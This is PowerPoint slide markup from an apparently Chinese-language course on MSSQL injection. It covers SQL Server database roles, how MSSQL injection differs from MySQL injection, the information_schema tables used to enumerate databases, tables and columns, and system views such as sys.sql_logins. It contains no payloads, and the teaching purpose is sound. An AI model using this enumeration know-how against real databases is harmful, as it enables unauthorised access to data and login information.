                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_backoperator</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>可以备份数据库的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="497289">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_denydatareader</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>不能看到数据库中任何数据的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="497289">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_denydatawriter</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>不能改变数据库中任何数据的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315807" y="2672081"/>
            <a:ext cx="4473787" cy="303422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marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>特殊的固定数据库角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>public角色是一种特殊的固定数据库角色，数据库的每个合法用户都属于该角色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>它为数据库中的用户提供了所有默认权限。即给予那些没有适当权限的所有用户以一定的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>public角色为数据库中的所有用户都保留了默认的权限，因此是不能被删除的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489374" y="1248833"/>
            <a:ext cx="10660380" cy="233909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marL="380990" indent="-379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>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注入与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>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注入的区别：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>、对象不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="230288" defTabSz="1219170">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sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MSSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>注入的对象是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Microsoft SQL SEVER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="230288" defTabSz="1219170">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sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>注入的对象是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>、语句不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>由于不同的数据库的语法都不同，所以注入的语句也不同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489373" y="3699934"/>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zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>在注入过程中常用的</a:t>
            </a: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结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>——information_schema结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489374" y="4225714"/>
            <a:ext cx="11818620" cy="1556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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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Information_schema结构包含数据库关键信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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“SCHEMATA”表，用于存储数据库名，其中的关键字段为SCHEMA_NAME表示数据库名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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“TABLES”表，用于存储表名。其中关键字段TABLE_NAME表示表的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="160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a:t>
            </a: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COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="160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a:t>
            </a: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表，用于存储字段名。其中关键字段COLUMN_NAME表示字段名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37034336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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489374" y="1248834"/>
            <a:ext cx="10660380" cy="4489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marL="380990" indent="-379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>视图表：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="表格 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049A670A-1C76-354B-92A9-782F4FBB3639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="831783" y="2149235"/>
          <a:ext cx="10514472" cy="2560032"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5257236">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5257236">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>视图表</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sys.databases</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>SQL Server </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>中所有数据库</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sys.sql_logins</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
